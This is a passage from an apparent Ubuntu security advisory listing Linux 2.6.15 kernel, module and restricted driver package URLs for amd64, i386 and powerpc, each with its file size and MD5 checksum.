  Size/MD5:    33730 5991265208e2a44916d540822bd1ac9c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb
  Size/MD5:   138546 ef8d40670f8aa326b3de679d3843e42e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb
  Size/MD5:    38926 5cdd7a00236247e10834b2ca00aa938d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-52-amd64-generic-di_2.6.15-52.67_amd64.udeb
  Size/MD5:   278736 3d615d96e1648ed1f8a72b9b770fa847
http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.15/avm-fritz-kernel-source_3.11+2.6.15.12-52.3_amd64.deb
  Size/MD5:  2405512 0b06044aefe8becb1d0467f5bfdc247d
http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.15/fglrx-kernel-source_8.25.18+2.6.15.12-52.3_amd64.deb
  Size/MD5:   511050 e10b89624f7e210d063a0197902e19eb
http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.15/nvidia-kernel-source_1.0.8776+2.6.15.12-52.3_amd64.deb
  Size/MD5:  1754564 c5c2d9b0533602e9c3e3de858184a655
http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.15/nvidia-legacy-kernel-source_1.0.7174+2.6.15.12-52.3_amd64.deb
  Size/MD5:  1406452 0ea039bbeca0570589afa2e51744c3c1
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/avm-fritz-firmware-2.6.15-52_3.11+2.6.15.12-52.3_amd64.deb
  Size/MD5:   475572 4432740400b495606aa776d96ba4ba18
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/fglrx-control_8.25.18+2.6.15.12-52.3_amd64.deb
  Size/MD5:    76748 cc23398150beebe4a1d561bf9ff81706
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-2.6.15-52-amd64-generic_2.6.15.12-52.3_amd64.deb
  Size/MD5:  6861864 0654701d92f5de082562a776d201c110
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-2.6.15-52-amd64-k8_2.6.15.12-52.3_amd64.deb
  Size/MD5:  6861248 3ea71d011938ba44253b417acb105e80
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-2.6.15-52-amd64-xeon_2.6.15.12-52.3_amd64.deb
  Size/MD5:  6837846 6642dc1eff1db10dedd772a63641124a
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/nic-restricted-firmware-2.6.15-52-amd64-generic-di_2.6.15.12-52.3_amd64.udeb
  Size/MD5:   798882 0dfab4528cb8a35acaefe9927000f685
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/nic-restricted-modules-2.6.15-52-amd64-generic-di_2.6.15.12-52.3_amd64.udeb
  Size/MD5:   497228 5922e6e6038e6144f2e9643bf8de2287
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/nvidia-glx-dev_1.0.8776+2.6.15.12-52.3_amd64.deb
  Size/MD5:   167244 eb84a383434ff2a22cc68fb0ca060215
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/nvidia-glx-legacy-dev_1.0.7174+2.6.15.12-52.3_amd64.deb
  Size/MD5:   162302 fa7b1343f60ffbc8298da3bb0f7ac206
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/nvidia-glx-legacy_1.0.7174+2.6.15.12-52.3_amd64.deb
  Size/MD5:  6071704 db1d1a77b262ccd2e7d4bf4212919e1b
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/nvidia-glx_1.0.8776+2.6.15.12-52.3_amd64.deb
  Size/MD5:  7328604 305ee65ddbd1e715d5c8fc0d2e411db7
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/xorg-driver-fglrx-dev_7.0.0-8.25.18+2.6.15.12-52.3_amd64.deb
  Size/MD5:   125880 fe13a90e72b74c93432a97c4c2ecf88f
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/xorg-driver-fglrx_7.0.0-8.25.18+2.6.15.12-52.3_amd64.deb
  Size/MD5: 17297042 88992a1f7adea96330b4b1909a5a0605

i386 architecture (x86 compatible Intel/AMD):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/linux-backports-modules-2.6.15-52-386_2.6.15-52.10_i386.deb
  Size/MD5:   169386 de66f59240599c189971ff2617a32471
http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/linux-backports-modules-2.6.15-52-686_2.6.15-52.10_i386.deb
  Size/MD5:   177254 c645c75cefa72df027ecf9992a0321d3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/linux-backports-modules-2.6.15-52-k7_2.6.15-52.10_i386.deb
  Size/MD5:   175374 a78aeb6390f3b9056e0ba884aa7dea73
http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/linux-backports-modules-2.6.15-52-server-bigiron_2.6.15-52.10_i386.deb
  Size/MD5:   178040 ab1e27ab921d3c062af1d83a2711fd26
http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/linux-backports-modules-2.6.15-52-server_2.6.15-52.10_i386.deb
  Size/MD5:   178004 36432e0be482eff2ad7d7b11e3393685
http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/nic-updates-modules-2.6.15-52-386-di_2.6.15-52.10_i386.udeb
  Size/MD5:    90234 532960ad957a474af1d36f22c6f09d45
http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/scsi-updates-modules-2.6.15-52-386-di_2.6.15-52.10_i386.udeb
  Size/MD5:    90404 47bdb4c98e5bec0e9987190d0abc4ff6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb
  Size/MD5:    18968 d4428c28842acd44ebbc900062265429
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb
  Size/MD5:    43448 09b66d5cc8ce769329e5cb1f5c5ff88a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb
  Size/MD5:   105204 7a968c3b6170d141b0cd6ae69d9ccb57
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb
  Size/MD5:     2280 724ecd00ebbddee0cedc950d13e39c7e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb
  Size/MD5:    34572 257f312f78de2f814a6909fb11a51be3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb
  Size/MD5:    96958 b7e56256c4e585f3d2b6ad110370aebc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb
  Size/MD5:    37092 be752e4622e517275a340cff56052a0f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb
  Size/MD5:    44060 f2dc9462c8b4fb93e16f0cbbc39b5efb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb
  Size/MD5:   167734 762f6dd3391cb3477c7eae7c5cf0ba8d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb
  Size/MD5:    33928 6685b0652c78ded543a1cf9e49da7c50
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb
  Size/MD5:   137840 7698662c1142eb2c2f94b79145ec08ae
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb
  Size/MD5:    46872 f91472c2465256ba325975329f7ab850
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb
  Size/MD5:   132966 0fe968b8f8abfcb323e2834e60c100f5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb
  Size/MD5:   273450 f16f2f5c2cf9b35f5411785d1c57fc31
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb
  Size/MD5:   102252 10b945d089d0b473f999afedd1b922aa
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-52-386-di_2.6.15-52.67_i386.udeb
  Size/MD5:  1595606 0a4698dbff475bb5b82e70606f207a37
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-52-386_2.6.15-52.67_i386.deb
  Size/MD5:   859020 2b9ebda6ae3855a7732bd3d3641bd568
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-52-686_2.6.15-52.67_i386.deb
  Size/MD5:   858486 2e8859c47eb2536c12b47f57d1ebae95
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-52-k7_2.6.15-52.67_i386.deb
  Size/MD5:   859998 bd6e70b3830d5219e66a5414a1665dc7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-52-server-bigiron_2.6.15-52.67_i386.deb
  Size/MD5:   864228 d74d9ae20edecf320bb41b2e48c48e79
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-52-server_2.6.15-52.67_i386.deb
  Size/MD5:   858828 b27f151fa2fbf48ed5b3f5f9899f3adc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-52_2.6.15-52.67_i386.deb
  Size/MD5:  6913986 281a26735bed07a88bcb08df8cbd717e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-52-386_2.6.15-52.67_i386.deb
  Size/MD5: 21709730 fae2c52a1f4def5d9335feafd8d598cd
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-52-686_2.6.15-52.67_i386.deb
  Size/MD5: 22506028 869a8657c02443b272666d8fb1a20a1c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-52-k7_2.6.15-52.67_i386.deb
  Size/MD5: 22248206 b7c51bd51c0e66825a5bb4b098588756
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-52-server-bigiron_2.6.15-52.67_i386.deb
  Size/MD5: 23606178 bd2a7c7353793db1baf04eb545a1241d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-52-server_2.6.15-52.67_i386.deb
  Size/MD5: 23170614 47e400c98cb6f4f1073a7f36842a5753
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb
  Size/MD5:    15502 f5a50985b9f50e270313efd51c2893b7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb
  Size/MD5:   238534 4c6212ceee7d24bcbc795d95bc69e828
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb
  Size/MD5:   196974 a9b29abd1bd7f5d1785f3544541eedca
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-52-386-di_2.6.15-52.67_i386.udeb
  Size/MD5:  1048372 82c9bfc637ebd618304f722095df5c40
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb
  Size/MD5:  1740976 0400bbac3c7bbe293e2430299799128a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb
  Size/MD5:   160808 110bfbc0ed35dedcd74bf81dfce3c965
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb
  Size/MD5:     9160 326fcb48a6d761e7d6fdc3395b6a05d3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb
  Size/MD5:    76472 2152f88992c83e99b7c6873a2d4e5429
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb
  Size/MD5:    53252 0a9985175e890c75d41898fe2a305ff7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb
  Size/MD5:    33048 bcc3df2f0b1013c1929e25ee78123640
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb
  Size/MD5:    85618 90b6e1f3e431ac12634cfa076eac5bd2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb
  Size/MD5:     6018 7954bb0452b484484c6eb1705c23f40d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb
  Size/MD5:     8758 e823e4ef623bb5340a0c10d820b0890d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb
  Size/MD5:    53588 0c5cedfaa84510004be3540b21780568
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb
  Size/MD5:   130770 7e007a7496f3bcaa2b48eb7cac38f5be
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb
  Size/MD5:    98436 1bbfcdc956a8e8ef4081f8a66d553744
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb
  Size/MD5:    77176 58b8471224582c0f06064e11630f65b4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb
  Size/MD5:  1768402 b16dff64c8931b07180dff1957b6327c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb
  Size/MD5:    69552 2ecd40960f5beca9dad68467f7df8179
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb
  Size/MD5:    11760 cfc0671977f053bf36c857f98bfe2f1d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb
  Size/MD5:    36000 960e928198df9cc14f2b72ac6f87ac25
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb
  Size/MD5:   132582 a386519ba722acccea97790bc9b4032d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb
  Size/MD5:    38546 4324a6661a6f1969929a1fb36a428125
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-52-386-di_2.6.15-52.67_i386.udeb
  Size/MD5:   299114 41b70c88021a4251235b931f264f004c
http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.15/avm-fritz-kernel-source_3.11+2.6.15.12-52.3_i386.deb
  Size/MD5:  3692834 595b8d31f672e6d2b5e94648da587ff7
http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.15/fglrx-kernel-source_8.25.18+2.6.15.12-52.3_i386.deb
  Size/MD5:   661002 63b1640dc6f25d8bbf442eaeb5e2173e
http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.15/nvidia-kernel-source_1.0.8776+2.6.15.12-52.3_i386.deb
  Size/MD5:  1694452 ec63480260bd4686acf628b8f2d0a4d5
http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.15/nvidia-legacy-kernel-source_1.0.7174+2.6.15.12-52.3_i386.deb
  Size/MD5:  1401938 90d1be1d02ca2570e1ff9a53108a1062
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/avm-fritz-firmware-2.6.15-52_3.11+2.6.15.12-52.3_i386.deb
  Size/MD5:  1205122 63e3ce320bcceeb4b493534fd06878c8
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/fglrx-control_8.25.18+2.6.15.12-52.3_i386.deb
  Size/MD5:    73654 c5b237fa6f40a5e0c7c936398d10f4c2
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-2.6.15-52-386_2.6.15.12-52.3_i386.deb
  Size/MD5:  8139028 ab19aa5d26256f4a49b2567c575a6f81
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-2.6.15-52-686_2.6.15.12-52.3_i386.deb
  Size/MD5:  7940228 6bc6899225c548f30bb282c6fefbcd29
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-2.6.15-52-k7_2.6.15.12-52.3_i386.deb
  Size/MD5:  7939054 c910ba191cbe2ff1d2d98053fe4cb956
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/nic-restricted-firmware-2.6.15-52-386-di_2.6.15.12-52.3_i386.udeb
  Size/MD5:   798676 7645cf5367888c041a55cbf5b77b2889
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/nic-restricted-modules-2.6.15-52-386-di_2.6.15.12-52.3_i386.udeb
  Size/MD5:   476148 871e3b1a338b99efc146cc9366eb887a
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/nvidia-glx-dev_1.0.8776+2.6.15.12-52.3_i386.deb
  Size/MD5:   148028 25e50651fb1151932866f1acc8e8bfe9
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/nvidia-glx-legacy-dev_1.0.7174+2.6.15.12-52.3_i386.deb
  Size/MD5:   140470 cbe30a4e6fa074a07309cff5132626f2
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/nvidia-glx-legacy_1.0.7174+2.6.15.12-52.3_i386.deb
  Size/MD5:  3060728 3a15df06c905db7f71f027207c5e88e2
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/nvidia-glx_1.0.8776+2.6.15.12-52.3_i386.deb
  Size/MD5:  4063682 fe3a1277228b560e712727679f593062
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/xorg-driver-fglrx-dev_7.0.0-8.25.18+2.6.15.12-52.3_i386.deb
  Size/MD5:   111310 3fd2866dfad94c7765e6abb204fcb612
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/xorg-driver-fglrx_7.0.0-8.25.18+2.6.15.12-52.3_i386.deb
  Size/MD5: 10557498 51bf0387f432ed54accfa5c826c506fe

powerpc architecture (Apple Macintosh G3/G4/G5):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/linux-backports-modules-2.6.15-52-powerpc-smp_2.6.15-52.10_powerpc.deb
  Size/MD5:   185626 edd40cd6bcfb7d3b3e7e0c2fad187dc4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/linux-backports-modules-2.6.15-52-powerpc64-smp_2.6.15-52.10_powerpc.deb
  Size/MD5:   203454 6f359968188452ef0a9f7a47f2bc906b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/linux-backports-modules-2.6.15-52-powerpc_2.6.15-52.10_powerpc.deb
  Size/MD5:   183962 8899aea634394a432632795a0dab6848
http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/nic-updates-modules-2.6.15-52-powerpc-di_2.6.15-52.10_powerpc.udeb
  Size/MD5:    98104 2f7a355c7da2fe10c4e09e7b9ff57627
http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/nic-updates-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.10_powerpc.udeb
  Size/MD5:   121798 b21635edd66e1723b2613f336da66c8d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/scsi-updates-modules-2.6.15-52-powerpc-di_2.6.15-52.10_powerpc.udeb
  Size/MD5:   103292 290aefd555053af550427729d243bd34
http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.15/scsi-updates-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.10_powerpc.udeb
  Size/MD5:   112204 ee138e7f1bcf34a4521a3e0df2da6aec
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:    23730 bafae4f6b819e29a91cd933f137dbee6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:    25944 e19db8be47babd9bf1499a78d9ff15e6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:    49308 e146b2a92e8f0e07164a7c9cff823ace
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:    51516 9925e90269a01bd21dd3c54ff6642e45
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:     2302 c500d101fcce3284f388ba0021517811
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:     2478 4fd66e5160f5aae620afe96a8272390f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:    40186 da2f5a32687c2f750206d2061dc63f80
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:    43754 ed7b4e37cce3baf959c15cdbc2b98bfb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:   112598 4a2ff713c81aa3682d62f41d3b6243a1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:   120652 6271a631ab6ceae1fafb4285f39d5d61
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:    40848 88aecdbe93d317449c0ec94131afc1d6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:    45942 3eee30e2488a40f350925e08f2ce92a8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:    29022 a283d73e23a684b192ae938631669212
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:    29894 1a360f1958fcd42894a77c8784eb84f5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:   211398 becd75f98073840525214ae1c4fafa06
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:   225200 058c9c8645b2068508a97f2740f6234c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:    45054 2626be12e63debc289a31b51a9034dc8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:    40210 3eb61d86887039d2958fcff75b64dec1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:     1934 1454a948886eea5d833fec5846bd0e6a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:     2196 c49c45ecafeb391ee281333f4afef63b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:    80608 64e955478edb55a6b9c16d3e6ceae72c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:    85960 d7b342ae619eecffa1175394541247be
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:   111632 e550b1816f61b16b4c5144f7a0b35dd3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:   125776 844c66cbc66605eb82f75e23f339a29f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:    53404 faa41b9e613f37a472d120528df77530
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:    58476 57cc72611a1491286e1c1dbb2c59683f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:   147760 cc53b9050ec43a8be5c2fd324930109c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:   161706 dd3b423f109d3a038d69e59428339c36
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:   317482 a4585a426ce71864308dfbbb654003c6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:   287578 bad62b03eaa33f90e5781ce66418321f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-52-powerpc-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:   115852 af781795a328154d7d18723622483c27
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-52-powerpc64-smp-di_2.6.15-52.67_powerpc.udeb
  Size/MD5:   116516 fba37884eb62c2bb4e3d80be97364328
